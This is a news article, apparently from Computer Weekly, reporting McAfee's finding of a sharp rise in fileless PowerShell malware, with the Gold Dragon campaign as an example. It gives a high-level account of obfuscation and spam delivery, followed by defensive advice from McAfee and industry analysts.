Fileless attacks surge as hackers exploit PowerShell scripts

The latest quarterly threat report from McAfee noted a fourfold increase in fileless hacking attacks utilising Microsoft PowerShell scripts.

PowerShell is used mainly to automate administration tasks, such as running background commands, checking services installed on the system, terminating processes and managing configurations of systems and servers.

But attackers have used the PowerShell scripting language as a powerful, flexible tool for carrying out malicious attacks, McAfee warned.

McAfee Labs saw PowerShell malware grow by 267% in the fourth quarter of 2017, and by 432% year over year, as the threat category increasingly became a go-to toolbox for cyber criminals.

McAfee said the scripting language had become irresistible, with attackers using it in Microsoft Office files to execute the first stage of attacks.

In December 2017, Operation Gold Dragon, a malware campaign targeting the 2018 Winter Olympics, was uncovered. McAfee described the campaign as “an exemplary implementation of PowerShell malware in an attack”.

In its previous quarterly malware report, in September 2017, McAfee warned: “We have seen the execution of fileless malware with the help of PowerShell. Bartallex uses a combination of .bat and .vbs files to download its payload. Dridex uses PowerShell to help download and execute its payload. In the beginning of 2017, attackers used PowerShell to target the Mac.” 

Scripting languages provide attackers with the same abilities as file-based malware. According to McAfee, evasion is probably the key reason for the popularity of this attack tactic. Scripts are easy to obfuscate and thus difficult to detect.

“By going digital along with so many other things in our world, crime has become easier to execute, less risky and more lucrative than ever before,” said Steve Grobman, chief technology officer for McAfee. “It should be no surprise to see criminals focusing on stealthy, fileless PowerShell attacks, low-risk routes to cash through cryptocurrency mining, and attacks on soft targets such as hospitals.”

In its September report, McAfee noted that PowerShell could be obfuscated in several ways, including command shortcuts, escape characters, or encoding functions. Its efficiency to run directly from memory makes it stealthy and hard to detect.

It said PowerShell malware usually arrives via spam email. The embedded code in the mail contains the PowerShell code, which usually contains instructions to download another payload to carry out the primary malicious activity.

McAfee urged IT administrators to put in place measures to prevent users from running rogue scripts. 

“The biggest factor in preventing any kind of malware infection on a computer is the user. Users need to be aware of the risk of downloading and installing applications that they do not understand or trust. Malware can also be inadvertently downloaded by unaware users while browsing,” said the report.

User training is an area Emma Bickerstaffe, senior research analyst at the Information Security Forum (ISF), recently covered in her Computer Weekly article on thwarting fileless attacks, where she noted: “Several of the delivery vectors utilise some form of social engineering. This reinforces the need for organisations to train users on how to recognise and resist social engineering tactics.”

Attackers can also execute malicious commands using PowerShell in an interactive mode. In a recent Computer Weekly article covering fileless attacks, such as those that can be launched through PowerShell, Adrian Davis, director of ISC², warned: “Because nothing is written to the hard drive, the standard security controls – such as a signature-based antivirus – are rendered more, or completely, ineffective.” 

McAfee recommended IT departments ensure operating systems and browsers are kept up-to-date with the latest security patches. It also urged IT departments to upgrade anti-malware on endpoints and network gateways to the latest versions.

Given that it is an IT admin tool, ISC²’s Davis said the PowerShell script is considered legitimate code. Along with McAfee’s recommendations, he said: “Look at behavioural measures – for example, tracking the activity of superusers – and look for new or strange patterns. If a user – or superuser – suddenly starts to access systems or databases at odd times of the day or in different parts of the organisation, this could be an indicator of a compromise; and the organisation should then launch its incident response/management process to counteract it.”